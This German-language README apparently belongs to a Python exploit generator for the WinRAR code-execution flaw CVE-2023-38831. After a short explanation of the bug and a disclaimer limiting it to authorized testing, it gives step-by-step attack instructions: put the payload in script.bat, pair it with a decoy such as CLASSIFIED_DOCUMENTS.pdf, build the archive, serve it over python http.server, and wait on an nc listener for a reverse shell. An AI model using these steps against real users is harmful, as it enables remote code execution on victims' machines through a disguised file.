
Python-basierter Exploit-Generator für die WinRAR-Codeausführungssicherheitslücke CVE-2023-38831. Erstellt schädliche ZIP-Archive, die harmlose Dateien mit ausführbaren Payloads kombinieren, für autorisierte Sicherheitstests.
⚠️ Nur für Bildungs- und autorisierte Sicherheitsforschungszwecke
Vielen Dank an den ursprünglichen PoC-Autor b1tg und Group-IB Threat Intelligence
RARLabs WinRAR vor Version 6.23 erlaubt Angreifern, beliebigen Code auszuführen, wenn ein Benutzer versucht, eine harmlose Datei in einem ZIP-Archiv anzuzeigen.

Das Problem tritt auf, weil ein ZIP-Archiv eine harmlose Datei (z. B. eine gewöhnliche .JPG-Datei) und auch einen Ordner mit demselben Namen wie die harmlose Datei enthalten kann. Die Inhalte des Ordners (die ausführbare Inhalte enthalten können) werden verarbeitet, wenn versucht wird, nur auf die harmlose Datei zuzugreifen. Dies wurde zwischen April und August 2023 in freier Wildbahn ausgenutzt.

Ändern Sie zunächst die Datei script.bat mit Ihrem gefährlichen Ausführungscode.
Fügen Sie die Köderdatei ein, empfohlen wird ein Bild (.png, .jpg) oder ein Dokument (.pdf).
Führen Sie den Befehl aus, um die Exploit-Datei zu generieren:
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
Senden Sie die Exploit-Datei an das Zielgerät mit python http.server, zum Beispiel:
python -m http.server
Richten Sie den Listener auf Ihrem Angreifer-Rechner ein:
nc -nlvp 4444
Laden Sie die Exploit-Datei herunter und öffnen Sie sie mit WinRAR vor Version 6.23.